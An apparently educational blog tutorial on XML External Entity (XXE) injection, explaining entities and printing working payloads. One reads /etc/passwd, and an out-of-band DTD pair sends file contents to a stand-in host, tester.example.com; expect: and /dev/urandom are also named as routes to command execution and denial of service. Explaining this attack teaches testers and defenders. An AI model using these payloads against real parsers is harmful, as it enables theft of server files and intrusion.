XXE: XML External Entity Injection

Published: 12 July 2020

XML Entity Injection is a powerful vulnerability that can allow for confidential data theft and in rare cases command execution. It was also often overlooked for a while - but now it features in the OWASP Top 10 as A4 it's a lot more well known.

The issue comes about within XML parsers where external entities are processed which can allow for URIs to be loaded.

Wait, back up. What's an entity? An easy way to think of entities is like a variable. It can hold strings, so an entity can be used in XML to hold text content - or it can be used with a URI to load remote content.

If you have an application which processes XML you're going to see something like this:

<?xml version='1.0' encoding='UTF-8'?> 
<todo>
<item>Buy more Toilet Roll</item>
</todo>

With many parsers you can modify this content and define entities. Here's a simple example with an entity defined:

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE replace [<!ENTITY example "Toilet Roll"> ]>
<todo>
<item>Buy more &example;</item>
</todo>

In the above example you can see some XML is defined, with a DTD (that's the DOCTYPE line shown in bold) which defines an internal entity. This one is "internal" as it is defined entirely within the DTD, it doesn't reference any external resources. When this XML is parsed the part that reads "&example;" within the item node will be replaced with the value of the example entity - which is Toilet Roll.

Like this:

An internal entity in use

This example uses an internal entity, much like a common programming variable - to cause a chosen string to be included in the application output.

That's an internal entity in use, you can see the message in the input box at the bottom has been sent to the application and the application has outputted "Buy more Toilet Roll", showing the internal entity has been parsed.

Internal entities are not usually a big deal from a security point of view. However if we change the syntax slightly we can load an external entity which opens the ability to load remote resources.

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]> 
<todo>
<item>Buy more &example;</item>
</todo>

This will load the supplied URI and include it within the application response. Here a file: URI is used so it may be possible to access server-side files, but other URIs can lead to related issues - such as https: allowing for server-side requests to be sent, possibly bypassing firewall restrictions to access internal applications. 

An external entity in use.

This example causes confidential data disclosure by requesting the content of a file on the web server. Here you can see the /etc/passwd file disclosed.

As mentioned above, much more rarely, it's also possible to cause denial of service conditions or even remote code execution. Service denial may be achieved by accessing resources which will never return (such as /dev/urandom) and code execution can be achieved if non-default modules such as expect: are loaded. Like this:

In rare cases, such as when the non-default expect module is loaded, remote command execution can be achieved.

Out of Band Exploitation

It's also possible to exploit XEE out of band, meaning that if an application processes XML but does not render the output within the application it's still possible to exfiltrate confidential data. This is achieved by the vulnerable parser to forward the response to an external server.

This attack takes two steps, the first is to host a DTD on an accessible web server, something like this:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'http://tester.example.com/log_xxe?data=%payload;'>"> 

The intention of this file is to load the target file (in this example /etc/passwd) and append the result to the end of a web request to a server you can access (in this case tester.example.com). To utilise this DTD you would send a request to the vulnerable web server like the below:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://tester.example.com/xxe_file"> %pe; %param1; ]>
<foo>&external;</foo> 

This would cause the vulnerable application to load the remote DTD, which executes as described above. You can verify the exploit worked by checking the server logs, an initial request will be logged for the xxe_file followed shortly by a request containing the file content.